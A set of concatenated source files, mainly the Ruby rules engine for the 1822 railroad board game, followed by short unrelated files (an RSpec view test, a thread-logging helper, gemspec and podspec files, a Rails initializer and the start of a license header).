    next if other == route || train_type(other.train) != type

    other.paths
  end
end
# Corporations over their train limit; extra trains (2P, LP, pullman) are
# exempt from the limit. Memoized.
def crowded_corps
  @crowded_corps ||= corporations.select do |corp|
    corp.trains.reject { |t| extra_train?(t) }.size > train_limit(corp)
  end
end
# In addition to the base discounts, every L train may be traded in towards
# a 2 train for a fixed upgrade cost.
def discountable_trains_for(corporation)
  upgrades = super
  corporation.trains.each do |train|
    upgrades << [train, train, '2', self.class::UPGRADE_COST_L_TO_2] if train.name == 'L'
  end
  upgrades
end
# A company's abilities are usable only by its current owner.
def entity_can_use_company?(entity, company)
  company.owner == entity
end
# Phase event: every open concession closes without compensation, and any
# unfloated major no longer needs one — it now floats at 50% sold.
def event_close_concessions!
  @log << '-- Event: Concessions close --'
  open_concessions = @companies.select do |c|
    c.id[0] == self.class::COMPANY_CONCESSION_PREFIX && !c.closed?
  end
  open_concessions.each(&:close!)
  @corporations.each do |corporation|
    next if corporation.floated? || corporation.type != :major

    corporation.par_via_exchange = nil
    corporation.float_percent = 50
  end
end
# Phase event: majors that have not yet floated will receive full
# capitalisation when they do.
def event_full_capitalisation!
  @log << '-- Event: Major companies now receives full capitalisation when floated --'
  @corporations.each do |corporation|
    corporation.capitalization = :full if !corporation.floated? && corporation.type == :major
  end
end
# After the base float, a fully-capitalised major moves its unsold IPO
# shares straight into the market.
def float_corporation(corporation)
  super
  return unless @phase.status.include?('full_capitalisation') && corporation.type == :major

  remaining = ShareBundle.new(corporation.shares_of(corporation))
  @share_pool.transfer_shares(remaining, @share_pool)
  @log << "#{corporation.name}'s remaining shares are transferred to the Market"
end
# Whole-pound amounts use the default formatter; fractional amounts
# (e.g. half-value mail subsidies) show one decimal place.
def format_currency(val)
  fractional = !(val % 1).zero?
  return format('£%.1<val>f', val: val) if fractional

  super
end
# Only minor 14 (Metropolitan) chooses its home location — any London city.
# Every other corporation has a fixed home, so nil is returned.
def home_token_locations(corporation)
  return unless corporation.id == self.class::MINOR_14_ID

  [hex_by_id(self.class::LONDON_HEX)]
end
# Shares a major may issue: only after operating twice, only while IPO shares
# remain, only bundles the market can absorb; prices reflect the market drop.
def issuable_shares(entity)
  return [] unless entity.corporation? && entity.type == :major
  return [] if entity.num_ipo_shares.zero? || entity.operating_history.size < 2

  bundles = bundles_for_corporation(entity, entity)
  bundles.select { |bundle| @share_pool.fit_in_bank?(bundle) }
         .map { |bundle| reduced_bundle_price_for_market_drop(bundle) }
end
# From phase 3 majors get the double tile lay; a private company's lay acts
# through its owning corporation.
def tile_lays(entity)
  operator = entity.company? ? entity.owner : entity
  major = operator.corporation? && operator.type == :major
  return self.class::MAJOR_TILE_LAYS if major && @phase.name.to_i >= 3

  super
end
# Contextual help shown on the route screen: L-train rules, the destination
# token bonus, and mail contract subsidies — each only when relevant.
def train_help(runnable_trains)
  return [] if runnable_trains.empty?

  entity = runnable_trains.first.owner
  owns_l_train = runnable_trains.any? { |t| t.name == 'L' }
  destination_token = nil
  destination_token = entity.tokens.find { |t| t.used && t.type == :destination } if entity.type == :major
  mail_contracts = entity.companies.any? { |c| self.class::PRIVATE_MAIL_CONTRACTS.include?(c.id) }

  help = []
  if owns_l_train
    help << "L (local) trains run in a city which has a #{entity.name} token. "\
            'They can additionally run to a single small station, but are not required to do so. '\
            'They can thus be considered 1 (+1) trains. '\
            'Only one L train may operate on each station token.'
  end
  if destination_token
    help << 'When a train runs between its home station token and its destination station token it doubles the '\
            'value of its destination station. This only applies to one train per operating '\
            'turn.'
  end
  if mail_contracts
    help << 'Mail contract(s) gives a subsidy equal to one half of the base value of the start and end '\
            'stations from one of the trains operated. Doubled values (for E trains or destination tokens) '\
            'do not count.'
  end
  help
end
# Wires up concessions before the base setup: a company with an
# exchange-from-par ability becomes the par vehicle for its major.
def init_company_abilities
  @companies.each do |company|
    ability = abilities(company, :exchange)
    next if ability.nil? || !ability.from.include?(:par)

    exchange_corporations(ability).first.par_via_exchange = company
  end
  super
end
# The game opens with a stock round (bidding happens inside it).
def init_round
  stock_round
end
# A corporation must buy a train when it owns no qualifying train — extra
# trains (2P, LP, pullman) do not count — and the depot still has trains.
def must_buy_train?(entity)
  entity.trains.all? { |t| extra_train?(t) } && !depot.depot_trains.empty?
end
# All floated minors operate before any major; each group keeps normal order.
# TODO: [1822] Make include with 1861, 1867
def operating_order
  floated = @corporations.select(&:floated?).sort
  minors, majors = floated.partition { |corp| corp.type == :minor }
  minors + majors
end
# Builds an operating round with the 1822-specific step sequence.
# Step order is significant: pending/home tokens resolve first, then
# track/token/route/dividend, then train purchase, minor acquisition
# (which may itself create a pending token) and share issuing.
def operating_round(round_num)
  Engine::Round::Operating.new(self, [
    G1822::Step::PendingToken,
    G1822::Step::FirstTurnHousekeeping,
    Engine::Step::AcquireCompany,
    Engine::Step::DiscardTrain,
    G1822::Step::SpecialChoose,
    G1822::Step::SpecialTrack,
    G1822::Step::Track,
    G1822::Step::DestinationToken,
    G1822::Step::Token,
    G1822::Step::Route,
    G1822::Step::Dividend,
    G1822::Step::BuyTrain,
    G1822::Step::MinorAcquisition,
    G1822::Step::PendingToken,
    Engine::Step::DiscardTrain,
    G1822::Step::IssueShares,
  ], round_num: round_num)
end
# Places the home token unless it is already down. LNWR additionally places
# its destination token immediately, although the destination bonus only
# applies once home and destination are connected.
def place_home_token(corporation)
  return if corporation.tokens.first&.used

  super

  return unless corporation.id == 'LNWR'

  destination_hex = hex_by_id(self.class::DESTINATIONS[corporation.id])
  destination = corporation.find_token_by_type(:destination)
  place_destination_token(corporation, destination_hex, destination)
end
# A player's net worth is reduced by any outstanding emergency loan.
def player_value(player)
  debt = @player_debts[player]
  player.value - debt
end
# Player-owned companies the given entity could buy in: open, not no-buy,
# not the entity's own, and allowed by the private-acquisition rules.
def purchasable_companies(entity = nil)
  return [] unless entity

  @companies.select do |company|
    next false unless company.owner&.player?
    next false if company.owner == entity || company.closed?
    next false if abilities(company, :no_buy)

    acquire_private_company?(entity, company)
  end
end
# Market bundles a major may redeem — only those it can afford.
def redeemable_shares(entity)
  return [] unless entity.corporation? && entity.type == :major

  bundles_for_corporation(@share_pool, entity).select { |bundle| entity.cash >= bundle.price }
end
# Revenue for a single route. Normal trains use the base calculation;
# e-trains only score cities containing the owner's token, with a tokened
# English Channel scoring as the France offboard. The destination bonus, if
# earned, is added to exactly one route of the run.
def revenue_for(route, stops)
  raise GameError, 'Route visits same hex twice' if route.hexes.size != route.hexes.uniq.size
  revenue = if train_type(route.train) == :normal
              super
            else
              entity = route.train.owner
              france_stop = stops.find { |s| s.offboard? && s.hex.name == self.class::FRANCE_HEX }
              # E-trains: sum only tokened cities.
              stops.sum do |stop|
                next 0 unless stop.city?
                tokened = stop.tokened_by?(entity)
                # If we got a token in English channel, calculate the revenue from the france offboard
                if tokened && stop.hex.name == self.class::ENGLISH_CHANNEL_HEX
                  france_stop ? france_stop.route_revenue(route.phase, route.train) : 0
                elsif tokened
                  stop.route_revenue(route.phase, route.train)
                else
                  0
                end
              end
            end
  destination_bonus = destination_bonus(route.routes)
  revenue += destination_bonus[:revenue] if destination_bonus && destination_bonus[:route] == route
  revenue
end
# Appends the destination bonus amount to the base revenue string when this
# route is the one carrying the bonus.
def revenue_str(route)
  str = super
  bonus = destination_bonus(route.routes)
  str += " (#{format_currency(bonus[:revenue])})" if bonus && bonus[:route] == route
  str
end
# Total mail contract subsidy for this set of routes (0 when none apply).
def routes_subsidy(routes)
  return 0 if routes.empty?

  bonuses = mail_contract_bonus(routes.first.train.owner, routes)
  return 0 if bonuses.empty?

  bonuses.sum { |bonus| bonus[:subsidy] }
end
# Pullmans never run on their own — they attach to another train's run.
def route_trains(entity)
  entity.runnable_trains.select { |t| !pullman_train?(t) }
end
# One-time game setup: bidding tokens, special-tile references, player debt
# tracking, company randomisation, bid boxes, exchange tokens and
# destination tokens.
def setup
  # Setup the bidding token per player
  @bidding_token_per_player = init_bidding_token
  # Init all the special upgrades
  @sharp_city ||= @tiles.find { |t| t.name == '5' }
  @gentle_city ||= @tiles.find { |t| t.name == '6' }
  @green_s_tile ||= @tiles.find { |t| t.name == 'X3' }
  @green_t_tile ||= @tiles.find { |t| t.name == '405' }
  # Initialize the extra city which minor 14 might add
  @london_extra_city_index = nil
  # Initialize the player debts, used if a player has to take an emergency loan
  @player_debts = Hash.new { |h, k| h[k] = 0 }
  # Randomize and setup the companies
  setup_companies
  # Setup the first bid boxes
  setup_bidboxes
  # Setup exchange token abilities for all corporations
  setup_exchange_tokens
  # Setup all the destination tokens, icons and abilities
  setup_destinations
end
# Stock round listing: majors only, parred companies first (in sort order),
# then the rest.
def sorted_corporations
  majors = @corporations.select { |corp| corp.type == :major }
  ipoed, not_ipoed = majors.partition(&:ipoed)
  ipoed.sort + not_ipoed
end
# Builds the 1822 stock round (handles bidding as well as share trading).
def stock_round
  G1822::Round::Stock.new(self, [
    Engine::Step::DiscardTrain,
    G1822::Step::BuySellParShares,
  ])
end
# Everything still in the bank pool — minors, concessions and privates —
# is available for bidding.
def unowned_purchasable_companies(_entity)
  prefixes = [self.class::COMPANY_MINOR_PREFIX,
              self.class::COMPANY_CONCESSION_PREFIX,
              self.class::COMPANY_PRIVATE_PREFIX]
  prefixes.flat_map { |prefix| bank_companies(prefix) }
end
# Total terrain cost for laying +tile+ on +hex+, applying the entity's
# matching tile-discount abilities (e.g. the GSWR hill discount).
def upgrade_cost(tile, hex, entity)
  # Abilities that discount terrain, restricted to this hex when hex-limited.
  abilities = entity.all_abilities.select do |a|
    a.type == :tile_discount && (!a.hexes || a.hexes.include?(hex.name))
  end
  tile.upgrades.sum do |upgrade|
    total_cost = upgrade.cost
    abilities.each do |ability|
      # The discount only applies when the ability's terrain matches the
      # upgrade's terrain exactly; the (possibly zero) discount is logged.
      discount = ability && upgrade.terrains.uniq == [ability.terrain] ? ability.discount : 0
      log_cost_discount(entity, ability, discount)
      total_cost -= discount
    end
    total_cost
  end
end
# Tile upgrade rules, layering 1822's special cases over the default:
# - the S hex upgrades white -> special yellow city -> X3 (green)
# - the T hexes upgrade white -> special yellow cities -> 405 (green)
# - Middleton Railway may swap a town tile for a plain-track tile that is
#   exactly one color step higher
def upgrades_to?(from, to, special = false)
  # Check the S hex and potential upgrades
  if self.class::UPGRADABLE_S_HEX_NAME == from.hex.name && from.color == :white
    return self.class::UPGRADABLE_S_YELLOW_CITY_TILE == to.name
  end
  if self.class::UPGRADABLE_S_HEX_NAME == from.hex.name &&
     self.class::UPGRADABLE_S_YELLOW_CITY_TILE == from.name
    return to.name == 'X3'
  end
  # Check the T hexes and potential upgrades
  if self.class::UPGRADABLE_T_HEX_NAMES.include?(from.hex.name) && from.color == :white
    return self.class::UPGRADABLE_T_YELLOW_CITY_TILES.include?(to.name)
  end
  if self.class::UPGRADABLE_T_HEX_NAMES.include?(from.hex.name) &&
     self.class::UPGRADABLE_T_YELLOW_CITY_TILES.include?(from.name)
    return to.name == '405'
  end
  # Special case for Middleton Railway where we remove a town from a tile:
  # the replacement must be exactly one color step above the source tile.
  if self.class::TRACK_TOWN.include?(from.name) && self.class::TRACK_PLAIN.include?(to.name)
    return Engine::Tile::COLORS.index(to.color) == (Engine::Tile::COLORS.index(from.color) + 1)
  end
  super
end
# Whether `entity` may acquire the private `company` right now: the
# company must have acquisition rules, the current phase must be reached,
# and the entity's type must be in the allowed list.
def acquire_private_company?(entity, company)
  requirements = self.class::PRIVATE_COMPANIES_ACQUISITION[company.id]
  return false unless requirements

  @phase.name.to_i >= requirements[:phase] &&
    requirements[:acquire].include?(entity.type)
end
# Charge 50% interest on every outstanding player loan and log the change.
def add_interest_player_loans!
  @player_debts.each do |player, debt|
    next unless debt.positive?

    interest = player_loan_interest(debt)
    total = debt + interest
    @player_debts[player] = total
    @log << "#{player.name} increases its loan by 50% (#{format_currency(interest)}) to "\
            "#{format_currency(total)}"
  end
end
# Records which London city slot received this token. If minor 14 is later
# acquired and its London token removed, that city reopens for others, and
# upgrades of London must keep the slot available (see upgrade_london).
def after_place_pending_token(city)
  return unless city.hex.name == self.class::LONDON_HEX

  @london_extra_city_index = city.tile.cities.index(city)
end
# Post-tile-lay hooks: London upgrades may need minor 14's extra slot
# restored, and a brown English Channel (two lanes to France) upgrades
# France to brown as well.
def after_lay_tile(hex, tile)
  upgrade_london(hex) if hex.name == self.class::LONDON_HEX
  upgrade_france_to_brown if hex.name == self.class::ENGLISH_CHANNEL_HEX && tile.color == :brown
end
# Leicester & Swannington Railway closes as soon as any of its two free
# tile lays has been used (count dropped below 2) by the end of the
# owner's track step.
def after_track_pass(entity)
  return unless entity.type == :major

  company = entity.companies.find { |c| c.id == self.class::COMPANY_LSR }
  return unless company

  tile_lay = company.all_abilities.find { |ability| ability.type == :tile_lay }
  remaining = tile_lay&.count
  return if !remaining || remaining == 2

  @log << "#{company.name} closes"
  company.close!
end
# Companies of the given type (single-character id prefix) still in the
# bank pool: never bought (no owner) or bank-owned, and not closed.
def bank_companies(prefix)
  @companies.select do |company|
    company.id[0] == prefix && (!company.owner || company.owner == @bank) && !company.closed?
  end
end
# The minors currently up for auction (front of the bank queue).
def bidbox_minors
  bank_companies(self.class::COMPANY_MINOR_PREFIX).take(self.class::BIDDING_BOX_MINOR_COUNT)
end
# The concessions currently up for auction (front of the bank queue).
def bidbox_concessions
  bank_companies(self.class::COMPANY_CONCESSION_PREFIX).take(self.class::BIDDING_BOX_CONCESSION_COUNT)
end
# The privates currently up for auction (front of the bank queue).
def bidbox_privates
  bank_companies(self.class::COMPANY_PRIVATE_PREFIX).take(self.class::BIDDING_BOX_PRIVATE_COUNT)
end
# An entity may own at most one pullman and at most one permanent extra
# train; anything else is always allowed.
def can_gain_extra_train?(entity, train)
  if train.name == self.class::EXTRA_TRAIN_PULLMAN
    entity.trains.none? { |t| t.name == self.class::EXTRA_TRAIN_PULLMAN }
  elsif self.class::EXTRA_TRAIN_PERMANENTS.include?(train.name)
    entity.trains.none? { |t| self.class::EXTRA_TRAIN_PERMANENTS.include?(t.name) }
  else
    true
  end
end
# Destination bonus for a single route: the revenue of the destination
# token's city, earned only when the route connects the corporation's home
# token with its placed destination token. Returns nil when not applicable.
def calculate_destination_bonus(route)
  entity = route.train.owner
  # Only majors can have a destination token
  return nil unless entity.type == :major
  # Check if the corporation has placed its destination token on the map
  destination_token = entity.tokens.find { |t| t.used && t.type == :destination }
  return nil unless destination_token
  # First token is always the home token
  home_token = entity.tokens.first
  token_count = 0
  route.visited_stops.each do |stop|
    next unless stop.city?
    token_count += 1 if stop.tokens.any? { |t| t == home_token || t == destination_token }
  end
  # Both home token and destination token must be on the route for the bonus
  return nil unless token_count == 2
  { route: route, revenue: destination_token.city.route_revenue(route.phase, route.train) }
end
# Interest on a player loan: half the principal, rounded up to a whole
# currency unit.
def player_loan_interest(loan)
  (loan / 2.0).ceil
end
# Only Leicester & Swannington Railway grants an extra track lay.
def company_ability_extra_track?(company)
  self.class::COMPANY_LSR == company.id
end
# The one-time choice offered by the EGR private. Returns {} for every
# other company, and for EGR once a choice has been made (making a choice
# adds an ability, so a non-empty ability list means the choice is spent).
# Simplified from the original's redundant condition:
# `id != EGR || (id == EGR && !abilities.empty?)` == `id != EGR || !abilities.empty?`.
def company_choices(company)
  return {} if company.id != self.class::COMPANY_EGR || !company.all_abilities.empty?

  {
    'token' => 'Receive a discount token that can be used to pay the full cost of a single '\
               'track tile lay on a rough terrain, hill or mountain hex.',
    'discount' => 'Receive a £20 continuous discount off the cost of all hill and mountain terrain '\
                  '(i.e. NOT off the cost of rough terrain).',
  }
end
# Applies the EGR private's chosen option: either a single free terrain
# tile lay ('token') or a permanent £20 hill/mountain discount. No-op for
# other companies or once EGR's choice has already been made.
# Guard simplified from the original's redundant condition (see company_choices).
def company_made_choice(company, choice)
  return if company.id != self.class::COMPANY_EGR || !company.all_abilities.empty?

  company.desc = company_choices(company)[choice]
  if choice == 'token'
    # One free lay that covers the full terrain cost of a single tile.
    ability = Engine::Ability::TileLay.new(type: 'tile_lay', tiles: [], hexes: [], owner_type: 'corporation',
                                           count: 1, closed_when_used_up: true, reachable: true, free: true,
                                           special: false, when: 'track')
    company.add_ability(ability)
  else
    # Continuous £20 discount on both hill and mountain terrain.
    %w[mountain hill].each do |terrain|
      ability = Engine::Ability::TileDiscount.new(type: 'tile_discount', discount: 20, terrain: terrain)
      company.add_ability(ability)
    end
  end
end
# Largest destination bonus among the routes (with E-trains one route's
# bonus can exceed another's), or nil when no route earns one.
def destination_bonus(routes)
  return nil if routes.empty?

  bonuses = routes.map { |route| calculate_destination_bonus(route) }.compact
  bonuses.sort_by { |bonus| bonus[:revenue] }.last
end
# Number of visited stops located in the English Channel or France.
def english_channel_visit(visits)
  channel_hexes = [self.class::ENGLISH_CHANNEL_HEX, self.class::FRANCE_HEX]
  visits.count { |visit| channel_hexes.include?(visit.hex.name) }
end
# How many exchange tokens the entity still has; 0 when it has none (or
# never had the ability).
def exchange_tokens(entity)
  ability = entity.all_abilities.find { |a| a.type == :exchange_token }
  ability ? ability.count : 0
end
# True for trains that do not count against the train limit.
def extra_train?(train)
  self.class::EXTRA_TRAINS.include?(train.name)
end
# Company ids are "<prefix><corporation id>" (e.g. "C1" -> corporation "1"),
# so stripping the first character yields the matching corporation's id.
def find_corporation(company)
  corporation_by_id(company.id[1..-1])
end
# Bidding tokens per player, looked up by player count (keys are strings).
def init_bidding_token
  self.class::BIDDING_TOKENS[@players.size.to_s]
end
# The minor 14 ability: a £20 token that may squeeze into London one slot
# beyond the normal limit (cheater: 1).
def london_extra_token_ability
  Engine::Ability::Token.new(type: 'token', hexes: [], price: 20, cheater: 1)
end
# Mail-contract subsidies: each contract pays half of the base revenue of
# a route's first and last stops; the best routes are used, one per
# contract the entity owns. Returns [] when the entity has no contracts.
def mail_contract_bonus(entity, routes)
  contracts = entity.companies.count { |c| self.class::PRIVATE_MAIL_CONTRACTS.include?(c.id) }
  return [] if contracts.zero?

  bonuses = routes.map do |route|
    stops = route.visited_stops
    next if stops.size < 2

    halves = [stops.first, stops.last].map { |stop| stop.route_base_revenue(route.phase, route.train) / 2 }
    { route: route, subsidy: halves.sum }
  end.compact
  bonuses.sort_by { |bonus| bonus[:subsidy] }.reverse.take(contracts)
end
# Consume one exchange token and turn it into a regular token on the
# entity's charter at the standard token price.
def move_exchange_token(entity)
  remove_exchange_token(entity)
  entity.tokens << Engine::Token.new(entity, price: self.class::TOKEN_PRICE)
end
# Zeroes a company's revenue once it has been acquired.
# NOTE(review): the method name has a typo ("aqcuired"); it is kept because
# callers elsewhere reference it by this exact name — rename file-wide if
# desired.
def on_aqcuired_remove_revenue(company)
  company.revenue = 0
end
# Flip a train-granting private into its train: the acquiring entity gets
# the attached train for free, then the private closes.
# Raises GameError if the entity already owns a conflicting extra train.
def on_acquired_train(company, entity)
  train = @company_trains[company.id]
  raise GameError, "Can't gain an extra #{train.name}, already have one" unless can_gain_extra_train?(entity, train)

  buy_train(entity, train, :free)
  @log << "#{entity.name} gains a #{train.name} train"
  company.close!
  @log << "#{company.name} closes"
end
# Clear a player's loan. Loan money lives outside the bank pool, so the
# repayment is simply removed from the player's cash, not paid anywhere.
def payoff_player_loan(player)
  player.cash -= @player_debts[player]
  @player_debts[player] = 0
end
# Place the corporation's destination token in the hex's (single) city,
# remove the matching map icon and the :destination ability, and refresh
# the route graph.
def place_destination_token(entity, hex, token)
  city = hex.tile.cities.first
  # Free and unchecked: destination tokens ignore slot limits and cost.
  city.place_token(entity, token, free: true, check_tokenable: false, cheater: 0)
  hex.tile.icons.reject! { |icon| icon.name == "#{entity.id}_destination" }
  ability = entity.all_abilities.find { |a| a.type == :destination }
  entity.remove_ability(ability)
  # Token placement changes connectivity, so the cached graph is stale.
  @graph.clear
  @log << "#{entity.name} places its destination token on #{hex.name}"
end
# Outstanding loan for the player; 0 when none is recorded.
def player_debt(player)
  @player_debts[player] || 0
end
# True when the train is the pullman extra train.
def pullman_train?(train)
  self.class::EXTRA_TRAIN_PULLMAN == train.name
end
# Reprice the bundle as if the market had already moved one step per share
# being sold, and return the (mutated) bundle.
# NOTE(review): direction :up is taken from the original — presumably this
# matches 1822's market orientation for drops; confirm against the
# stock-market definition.
def reduced_bundle_price_for_market_drop(bundle)
  directions = Array.new(bundle.num_shares, :up)
  bundle.share_price = @stock_market.find_share_price(bundle.corporation, directions).price
  bundle
end
# Everything sitting in a bid box is owned by the bank for this stock round.
def setup_bidboxes
  (bidbox_minors + bidbox_concessions + bidbox_privates).each do |company|
    company.owner = @bank
  end
end
# Spend one of the entity's exchange tokens and refresh the ability's
# human-readable description to show the remaining count.
def remove_exchange_token(entity)
  ability = entity.all_abilities.find { |a| a.type == :exchange_token }
  ability.use!
  ability.description = "Exchange tokens: #{ability.count}"
end
# Hand `player` the loan cash and record the debt.
# Give the player the money. The money for loans is outside money; it
# doesn't count towards the normal bank money.
# NOTE(review): only the 50% interest is added to @player_debts here — the
# principal is presumably tracked by the caller or implied by the cash
# handed out; confirm against the emergency-loan flow before changing.
def take_player_loan(player, loan)
  player.cash += loan
  # Add interest to the loan; the player must pay at least 150% of the
  # loaned value in total.
  @player_debts[player] += player_loan_interest(loan)
end
# E-trains are categorized separately from all other (normal) trains.
def train_type(train)
  return :etrain if train.name == 'E'

  :normal
end
# France is off-map: swap in its fixed brown-phase (gray-coded) tile.
def upgrade_france_to_brown
  brown_tile = Engine::Tile.from_code(self.class::FRANCE_HEX, :gray, self.class::FRANCE_HEX_BROWN_TILE)
  brown_tile.location_name = 'France'
  hex_by_id(self.class::FRANCE_HEX).tile = brown_tile
end
# After a London upgrade, re-open the extra city slot that minor 14 added
# (no-op unless after_place_pending_token recorded the extra city index).
def upgrade_london(hex)
  return unless @london_extra_city_index
  extra_city = hex.tile.cities[@london_extra_city_index]
  # Only when the extra city holds exactly one token does it need the
  # additional open slot beyond the tile's normal slot count.
  return unless extra_city.tokens.one?
  extra_city.tokens[extra_city.normal_slots] = nil
end
private
# Pull a specific train out of the depot (e.g. to attach it to a private),
# optionally marking it unbuyable, and return it.
def find_and_remove_train_by_id(train_id, buyable: true)
  train_by_id(train_id).tap do |train|
    @depot.remove_train(train)
    train.buyable = buyable
  end
end
# Shuffle the company deck and prepare auction ordering, bid limits and
# the trains granted by train-privates.
def setup_companies
  # Randomize from preset seed to get the same order on every load
  @companies.sort_by! { rand }
  minors = @companies.select { |c| c.id[0] == self.class::COMPANY_MINOR_PREFIX }
  concessions = @companies.select { |c| c.id[0] == self.class::COMPANY_CONCESSION_PREFIX }
  privates = @companies.select { |c| c.id[0] == self.class::COMPANY_PRIVATE_PREFIX }
  # Always put P1, C1 and M24 first so they land in the first bidding box
  m24 = minors.find { |c| c.id == 'M24' }
  minors.delete(m24)
  minors.unshift(m24)
  c1 = concessions.find { |c| c.id == 'C1' }
  concessions.delete(c1)
  concessions.unshift(c1)
  p1 = privates.find { |c| c.id == 'P1' }
  privates.delete(p1)
  privates.unshift(p1)
  # Clear and re-add the companies in the randomized order, grouped by type
  @companies.clear
  @companies.concat(minors)
  @companies.concat(concessions)
  @companies.concat(privates)
  # Set the min bid on the concessions and minors; privates have no minimum
  @companies.each do |c|
    case c.id[0]
    when self.class::COMPANY_CONCESSION_PREFIX, self.class::COMPANY_MINOR_PREFIX
      c.min_price = c.value
    else
      c.min_price = 0
    end
    c.max_price = 10_000
  end
  # Attach the trains granted by train-privates (handed out later via
  # on_acquired_train)
  @company_trains = {}
  @company_trains['P3'] = find_and_remove_train_by_id('2P-0', buyable: false)
  @company_trains['P4'] = find_and_remove_train_by_id('2P-1', buyable: false)
  @company_trains['P1'] = find_and_remove_train_by_id('5P-0')
  @company_trains['P13'] = find_and_remove_train_by_id('P+-0', buyable: false)
  @company_trains['P14'] = find_and_remove_train_by_id('P+-1', buyable: false)
  # Setup the minor 14 extra-London-token ability
  corporation_by_id(self.class::MINOR_14_ID).add_ability(london_extra_token_ability)
end
# Give every corporation its destination ability, a destination token and
# a map icon on the destination hex.
def setup_destinations
  self.class::DESTINATIONS.each do |corp, destination|
    # LNWR's destination token is placed automatically when it floats.
    description = if corp == 'LNWR'
                    "Gets destination token at #{destination} when floated."
                  else
                    "Connect to #{destination} for your destination token."
                  end
    ability = Ability::Base.new(
      type: 'destination',
      description: description
    )
    corporation = corporation_by_id(corp)
    corporation.add_ability(ability)
    corporation.tokens << Engine::Token.new(corporation, logo: "/logos/1822/#{corp}_DEST.svg",
                                            type: :destination)
    hex_by_id(destination).tile.icons << Part::Icon.new("../icons/1822/#{corp}_DEST", "#{corp}_destination")
  end
end
# Give each corporation its per-game allotment of exchange tokens as an
# ability (later consumed through remove_exchange_token).
def setup_exchange_tokens
  self.class::EXCHANGE_TOKENS.each do |corp_id, token_count|
    corporation_by_id(corp_id).add_ability(
      Ability::Base.new(
        type: 'exchange_token',
        description: "Exchange tokens: #{token_count}",
        count: token_count
      )
    )
  end
end
end
end
end
end
| 36.814592 | 120 | 0.491718 |
ab4c811c22b1c9377f687cbaed1d825f045ffce3 | 420 | require 'spec_helper'
describe "categories/show" do
before(:each) do
@category = assign(:category, stub_model(Category,
:name => "Name",
:description => "Description"
))
end
it "renders attributes in <p>" do
render
# Run the generator again with the --webrat flag if you want to use webrat matchers
rendered.should match(/Name/)
rendered.should match(/Description/)
end
end
| 23.333333 | 87 | 0.669048 |
4ac5313655acb17f464369cacf09ea14d005fba7 | 96 | $LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'speedtest'
require 'byebug'
| 24 | 58 | 0.739583 |
2143580ed88117032f78018a3ea8e42f60031c4b | 1,639 | # frozen_string_literal: true
require 'thread'
require_relative 'logger'
module Listen
module Thread
class << self
# Creates a new thread with the given name.
# Any exceptions raised by the thread will be logged with the thread name and complete backtrace.
# rubocop:disable Style/MultilineBlockChain
def new(name, &block)
thread_name = "listen-#{name}"
caller_stack = caller
::Thread.new do
rescue_and_log(thread_name, caller_stack: caller_stack, &block)
end.tap do |thread|
thread.name = thread_name
end
end
# rubocop:enable Style/MultilineBlockChain
def rescue_and_log(method_name, *args, caller_stack: nil)
yield(*args)
rescue Exception => exception # rubocop:disable Lint/RescueException
_log_exception(exception, method_name, caller_stack: caller_stack)
end
private
def _log_exception(exception, thread_name, caller_stack: nil)
complete_backtrace = if caller_stack
[*exception.backtrace, "--- Thread.new ---", *caller_stack]
else
exception.backtrace
end
message = "Exception rescued in #{thread_name}:\n#{_exception_with_causes(exception)}\n#{complete_backtrace * "\n"}"
Listen.logger.error(message)
end
def _exception_with_causes(exception)
result = +"#{exception.class}: #{exception}"
if exception.cause
result << "\n"
result << "--- Caused by: ---\n"
result << _exception_with_causes(exception.cause)
end
result
end
end
end
end
| 29.8 | 124 | 0.639414 |
79fb343a31d918c8c3d4dcb760d6ed09f3ead920 | 1,165 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = 'aws-sdk-kinesisvideo'
spec.version = File.read(File.expand_path('../VERSION', __FILE__)).strip
spec.summary = 'AWS SDK for Ruby - Kinesis Video'
spec.description = 'Official AWS Ruby gem for Amazon Kinesis Video Streams (Kinesis Video). This gem is part of the AWS SDK for Ruby.'
spec.author = 'Amazon Web Services'
spec.homepage = 'http://github.com/aws/aws-sdk-ruby'
spec.license = 'Apache-2.0'
spec.email = ['[email protected]']
spec.require_paths = ['lib']
spec.files = Dir['lib/**/*.rb']
spec.metadata = {
'source_code_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-kinesisvideo',
'changelog_uri' => 'https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-kinesisvideo/CHANGELOG.md'
}
spec.add_dependency('aws-sdk-core', '~> 3')
spec.add_dependency('aws-sigv4', '~> 1.0')
end
| 38.833333 | 138 | 0.671245 |
0809b8ead45d5c74ae901f026a6152fcf7025efd | 271 | module ApplicationHelper
#Returns the full title on a per-page basis.
def full_title(page_title = '')
base_title = "Ruby on Rails Tutorial Sample App"
if page_title.empty?
base_title
else
page_title + " | " + base_title
end
end
end
| 20.846154 | 52 | 0.656827 |
ac87df517bc1089c8afd86a41099768c1591b678 | 1,235 | #
# Be sure to run `pod lib lint TMDBSwift.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = "TMDBSwift"
s.version = "0.5.1"
s.summary = "Swift wrapper for themoviedb.org api v3"
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = "Wrapper for themoviedb.org api v.3 written in Swift"
s.homepage = "https://github.com/gkye/TheMovieDatabaseSwiftWrapper"
s.license = 'MIT'
s.author = { "George Kye" => "[email protected]" }
s.source = { :git => "https://github.com/gkye/TheMovieDatabaseSwiftWrapper.git", :tag => s.version.to_s }
s.social_media_url = 'https://twitter.com/kyegeorge'
s.ios.deployment_target = '8.0'
s.source_files = 'Sources/**/*'
end
| 37.424242 | 117 | 0.663158 |
bf3ddfdeceea9a943db4c02976e6f547ef15539d | 159 | # Load the rails application
require File.expand_path('../application', __FILE__)
# Initialize the rails application
AuthyDeviseDemo::Application.initialize!
| 26.5 | 52 | 0.811321 |
79fd7aa23687a7cfeaaa883cef377b68eced32b0 | 655 | # Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
